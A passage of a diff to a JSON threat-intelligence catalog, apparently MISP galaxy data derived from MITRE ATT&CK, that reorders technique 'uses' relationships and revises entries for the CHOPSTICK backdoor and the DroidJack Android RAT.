"estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5007,12 +6151,89 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "7551188b-8f91-4d34-8350-0d0c57b2b913", @@ -5042,27 +6263,6 @@ ], "type": "uses" }, - { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -5070,34 +6270,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -5105,12 +6277,61 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", @@ -5156,42 +6377,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5204,34 +6390,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ @@ -5240,42 +6398,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5288,6 +6411,41 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -5295,6 +6453,69 @@ ], "type": "uses" }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ @@ -5347,12 +6568,138 @@ ], "type": "uses" }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6b62e336-176f-417b-856a-8552dd8c44e1", @@ -5396,14 +6743,7 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5424,7 +6764,7 @@ "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5437,6 +6777,13 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -5445,14 +6792,14 @@ "type": "uses" }, { - "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5485,13 +6832,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", "tags": [ @@ -5507,14 +6847,21 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5596,14 +6943,14 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5614,7 +6961,7 @@ "value": "adbupd - S0202" }, { - "description": "[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [Android version of the malware](https://attack.mitre.org/software/S0314).", + "description": "[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).", "meta": { "external_id": "S0023", "mitre_platforms": [ @@ -5626,10 +6973,12 @@ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", - "https://www.justice.gov/file/1080281/download" + "https://www.justice.gov/file/1080281/download", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "CHOPSTICK", + "Backdoor.SofacyX", "SPLM", "Xagent", "X-Agent", @@ -5672,20 +7021,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -5694,7 +7029,28 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5715,14 +7071,7 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5736,14 +7085,7 @@ "type": "uses" }, { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5757,7 +7099,28 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5768,7 +7131,7 @@ "value": "CHOPSTICK - S0023" }, { - "description": "[DroidJack RAT](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", "meta": { "external_id": "S0320", "mitre_platforms": [ @@ -5792,14 +7155,14 @@ "type": "uses" }, { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5869,20 +7232,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ @@ -5890,6 +7239,27 @@ ], "type": "uses" }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -5898,14 +7268,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5925,20 +7302,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ @@ -5946,34 +7309,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -5981,6 +7316,27 @@ ], "type": "uses" }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65", "tags": [ @@ -5989,7 +7345,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6037,13 +7400,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -6051,20 +7407,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -6073,28 +7415,7 @@ "type": "uses" }, { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6114,12 +7435,54 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + 